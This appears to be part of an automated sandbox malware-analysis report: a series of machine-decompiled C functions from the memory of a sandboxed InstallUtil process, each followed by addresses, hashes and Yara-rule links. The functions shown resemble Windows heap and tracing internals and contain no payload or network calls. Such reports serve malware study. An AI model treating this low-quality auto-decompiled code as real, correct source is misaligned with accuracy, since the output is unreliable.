				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x13bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E012E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0135fe96
0x0135fe9e
0x0135fea1
0x0135fead
0x0135feb3
0x0135feb9
0x0135fec3
0x0135fed5
0x0135fec5
0x0135fece
0x0135fece
0x0135fee0
0x0135fee1
0x0135fee3
0x0135fee8
0x0135fefb

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20fe9eb0708b87df219ece1d99559d050b6eab07ec03ddd13b13939b36d1dfa0
Instruction ID: eb5772c1ae8b1c114b6042f8b723cb36d1e5658c8fe7bf1ea9c48e64318601b1
Opcode Fuzzy Hash: 20fe9eb0708b87df219ece1d99559d050b6eab07ec03ddd13b13939b36d1dfa0
Instruction Fuzzy Hash: A5018670A0020DEFCB54DFA8D546A6EB7F4FF04704F144169B908DB382D635D901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0138131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0138131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x13bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E012E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0130B640(E01309AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0138131b
0x0138132a
0x01381330
0x01381336
0x0138133e
0x01381341
0x01381344
0x0138134f
0x01381361
0x01381351
0x0138135a
0x0138135a
0x0138136c
0x0138136d
0x0138136f
0x01381374
0x01381387

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ab0cbdbc373f1e42e28a0da94d2351ca656cb6fb00d4f73f3a94982e3170c1
Instruction ID: 7b2abf955fe60b2510c4f9fceb81144f380e86187746f00e782ea245c9be60b5
Opcode Fuzzy Hash: 46ab0cbdbc373f1e42e28a0da94d2351ca656cb6fb00d4f73f3a94982e3170c1
Instruction Fuzzy Hash: 62013C71A0120DAFCB44EFA9D545AAEB7F4FF18704F404069B905EB381E6749A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01398F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01398F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x13bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E012E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0130B640(E01309AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01398f6a
0x01398f79
0x01398f81
0x01398f84
0x01398f8b
0x01398f91
0x01398f94
0x01398f9e
0x01398fb0
0x01398fa0
0x01398fa9
0x01398fa9
0x01398fbb
0x01398fbc
0x01398fbe
0x01398fc3
0x01398fd6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f1395ecab497361d85cd84c06ec42048a03f4ae0acaca0f826762a4598d56d7
Instruction ID: 90dabb2de9a473979faedf53777beab70c5f90ed4427597c04d14563c2287da6
Opcode Fuzzy Hash: 7f1395ecab497361d85cd84c06ec42048a03f4ae0acaca0f826762a4598d56d7
Instruction Fuzzy Hash: EE014475A0120DAFDB00DFACD545AAEB7F4EF58304F504059B909EB381EB74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01381608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01381608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x13bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E012E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0130B640(E01309AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01381608
0x01381617
0x0138161d
0x01381625
0x01381628
0x0138162b
0x01381636
0x01381648
0x01381638
0x01381641
0x01381641
0x01381653
0x01381654
0x01381656
0x0138165b
0x0138166e

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a2cad02226b192f081e98d854c73b5ccc76df7a5c3b4d3a70c725816710b2c
Instruction ID: 20ac41d5432aa86e022bd587326ca24d17318e23168ad54820e73828a30261a1
Opcode Fuzzy Hash: c9a2cad02226b192f081e98d854c73b5ccc76df7a5c3b4d3a70c725816710b2c
Instruction Fuzzy Hash: 04F06271E0524CEFDB14EFA8D445A6EB7F8EF14304F444069A905EB381E6349A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012EC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E012EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E013988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x012ec577
0x012ec57d
0x012ec581
0x012ec5b5
0x012ec5b9
0x012ec5ce
0x012ec5ce
0x012ec5ca
0x00000000
0x012ec5ca
0x012ec5c4
0x012ec5c8
0x00000000
0x00000000
0x00000000
0x012ec5ad
0x00000000
0x012ec5af

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688b3e38b557198292dc1290470a9577f91fe8179c8528b0aa9d6ea52d194edc
Instruction ID: 43e0bd2aa0a40294c2734c439634058fcf443044b60ca9ea531eef687b6fa067
Opcode Fuzzy Hash: 688b3e38b557198292dc1290470a9577f91fe8179c8528b0aa9d6ea52d194edc
Instruction Fuzzy Hash: ADF0BEF29356969FE736C7ECE01CF627FE89B05670FD484A7D616A7202C6A4D8A0C250

Uniqueness

Uniqueness Score: -1.00%

Function 01382073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01382073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0137FD22(__ecx);
				_t19 =  *0x13b849c - _t3; // 0x30c3b4c4
				if(_t19 == 0) {
					__eflags = _t17 -  *0x13b8748; // 0x0
					if(__eflags <= 0) {
						E01381C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x13b8724 & 0x00000004;
							if(( *0x13b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x13b8724; // 0x0
					return E01378DF1(__ebx, 0xc0000374, 0x13b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01382076
0x01382078
0x0138207d
0x01382083
0x013820a4
0x013820aa
0x013820ac
0x013820b7
0x013820ba
0x013820bc
0x013820c9
0x013820c9
0x013820d0
0x013820d2
0x00000000
0x013820d2
0x013820be
0x013820c3
0x013820c5
0x013820c7
0x00000000
0x00000000
0x013820c7
0x013820bc
0x013820d4
0x01382085
0x01382085
0x013820a3
0x013820a3

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af1432679986e589a1403dcd3868f0f9300ff9d952528bf1fa98c9b69fa8262
Instruction ID: 153c412f678e7cf5943d7f82d15e349b62b565ce5010429c0b5dd05ffd1d537a
Opcode Fuzzy Hash: 2af1432679986e589a1403dcd3868f0f9300ff9d952528bf1fa98c9b69fa8262
Instruction Fuzzy Hash: 85F0A0BA8152858AEE33BF2C79522E33F9ED79621CF1A14C5D6A057209D5388893CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0130927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0130927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0130FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E013092C6(_t11, _t14);
				}
				return _t11;
			}

0x01309295
0x01309299
0x0130929f
0x013092aa
0x013092ad
0x013092ae
0x013092af
0x013092b0
0x013092b4
0x013092bb
0x013092bb
0x013092c5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: d57fe5e2461f6aafedfbe677edd004fb883e58ff32343e92d5662dfa3f2b0a44
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: B1E02B723405416BE7229E09CC94F1337DDDF92728F004078B9045E283C6E6DC0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01398D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01398D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x13bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E012E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0130B640(E01309AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01398d34
0x01398d43
0x01398d4b
0x01398d4e
0x01398d52
0x01398d5c
0x01398d6e
0x01398d5e
0x01398d67
0x01398d67
0x01398d79
0x01398d7a
0x01398d7c
0x01398d81
0x01398d94

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56ea03262e020c5eea5654366592a76b31567ca9532549b1bd0ff7c734b46e16
Instruction ID: 58570eb57e4f3c9cd0e3bb73e6430fa9dd7734863f7b22195d5ee765e210f635
Opcode Fuzzy Hash: 56ea03262e020c5eea5654366592a76b31567ca9532549b1bd0ff7c734b46e16
Instruction Fuzzy Hash: 42F05E70E0460DAFDB14EFB8D555B6EB7F8EF58704F5080A9EA05EB291EA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01398B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01398B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x13bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E012E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0130B640(E01309AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01398b67
0x01398b6f
0x01398b72
0x01398b7d
0x01398b8f
0x01398b7f
0x01398b88
0x01398b88
0x01398b9a
0x01398b9b
0x01398b9d
0x01398ba2
0x01398bb5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e1bc8f20017150eb2534a511ead5c0828f2faee06c00c5269ff8e220d168c2
Instruction ID: fcb7e9211e0a6dba5967a0d832b01b6db6f7418ead213600afd553dabb8b9e74
Opcode Fuzzy Hash: f0e1bc8f20017150eb2534a511ead5c0828f2faee06c00c5269ff8e220d168c2
Instruction Fuzzy Hash: A7F05EB1A1425DABDB10EBA8D916A6EB7A8AB44308F440499AA059B2C1EA74D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 012E746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E012E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E012DEB70(__ecx, 0x13b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E013095D0();
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x012e746d
0x012e746d
0x012e746d
0x012e7471
0x012e7488
0x0132f92d
0x012e748e
0x012e7491
0x012e7495
0x0132f937
0x0132f93a
0x0132f94e
0x0132f953
0x0132f956
0x0132f956
0x012e7495
0x00000000
0x012e7488
0x012e7473
0x012e7478
0x012e747d
0x012e7481
0x00000000
0x012e7481
0x012e747d
0x012e747a
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a131f362a80dd10751540454252b0ceb1b9f2c53d14ee1d7178d12c1180589d
Instruction ID: 0452ec3cd51474cd3f52a07dd5b8174df28d97195160be1527adce7a729c347f
Opcode Fuzzy Hash: 4a131f362a80dd10751540454252b0ceb1b9f2c53d14ee1d7178d12c1180589d
Instruction Fuzzy Hash: F1F0E234A3024AEADF12EB6CC845F79BFF5EF14218F840215EA91AB1A1E775D800C7C5

Uniqueness

Uniqueness Score: -1.00%

Function 01398CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01398CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x13bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E012E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0130B640(E01309AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01398ce5
0x01398ced
0x01398cf0
0x01398cfb
0x01398d0d
0x01398cfd
0x01398d06
0x01398d06
0x01398d18
0x01398d19
0x01398d1b
0x01398d20
0x01398d33

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb90f113d691a18177a862b33cd34fc687e9d73edf543357f88b42ea2a6d2792
Instruction ID: 37629721e2b6cfbf68559fbe616d641e63d257bab2f170f4198649f7c360990e
Opcode Fuzzy Hash: eb90f113d691a18177a862b33cd34fc687e9d73edf543357f88b42ea2a6d2792
Instruction Fuzzy Hash: 05F08270A0520DAFDF04DBA8E955E6E77F8EF59308F500199E915EB2C1EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 012C4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E013988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E012EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x12a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x012c4f2e
0x012c4f34
0x012c4f38
0x01320b85
0x01320b85
0x01320b89
0x01320b9a
0x01320b9a
0x01320b9f
0x00000000
0x01320b9f
0x01320b94
0x01320b98
0x00000000
0x00000000
0x00000000
0x01320b98
0x012c4f3e
0x012c4f48
0x00000000
0x012c4f6e
0x00000000
0x012c4f70

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09dd21cee23c1f68a4e58b6abaeb12fbf6df2f71894e69f0c06487945bf19292
Instruction ID: c3d0cf1a2891461ca166b054c1f5cf32b9b924227f8ca65f2554d2952acbf2b5
Opcode Fuzzy Hash: 09dd21cee23c1f68a4e58b6abaeb12fbf6df2f71894e69f0c06487945bf19292
Instruction Fuzzy Hash: 13F0E2325256A98FD776EB1CD184B22BBD5AB0177CF4444A4E40587922C724EC48C680

Uniqueness

Uniqueness Score: -1.00%

Function 012FA44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x13b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0130FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x012fa44b
0x012fa453
0x012fa472
0x012fa476
0x00000000
0x012fa493
0x012fa47a
0x012fa47f
0x012fa486
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef05ec457eadb5a9dacca8a4ed15e11a614a3d6b6d3a0bd502c2be01b995171
Instruction ID: 23d8e1e9747d20d258658c79b6233da400204650304e46fe94d7f041aba97c4d
Opcode Fuzzy Hash: 0ef05ec457eadb5a9dacca8a4ed15e11a614a3d6b6d3a0bd502c2be01b995171
Instruction Fuzzy Hash: 1CE09272A11422ABD2229A18AC00F66B39DEBE4651F094039EB08C7254D668DD01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 012CF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E012CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E012FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L012E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x012cf35d
0x012cf361
0x012cf367
0x012cf372
0x012cf38c
0x012cf38c
0x012cf394

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 2ddbb860268ec0e05f32d2eb46025c3295e4db7b1473dfd1366a6e186cf3e647
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: CFE0D833A50158FBDB21A7D99E05FAABFADDB54E60F00015ABF04DB190D5609D00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 012DFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E013988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E012E0050(_t14);
				}
			}

0x012dff66
0x012dff6b
0x00000000
0x012dff8f
0x00000000
0x012dff8f

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin
